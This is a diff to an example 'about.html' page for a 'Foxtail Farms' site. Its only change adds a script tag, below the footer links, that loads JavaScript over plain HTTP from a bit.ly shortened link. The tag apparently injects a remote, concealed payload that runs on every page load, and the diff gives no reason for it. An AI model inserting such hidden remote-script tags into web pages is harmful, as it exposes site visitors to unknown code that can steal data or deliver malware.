--- a/cookbook/examples/foxtail-farms/about.html
+++ b/cookbook/examples/foxtail-farms/about.html
@@ -206,5 +206,6 @@
                 <a href="#">Contact</a>
             </div>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
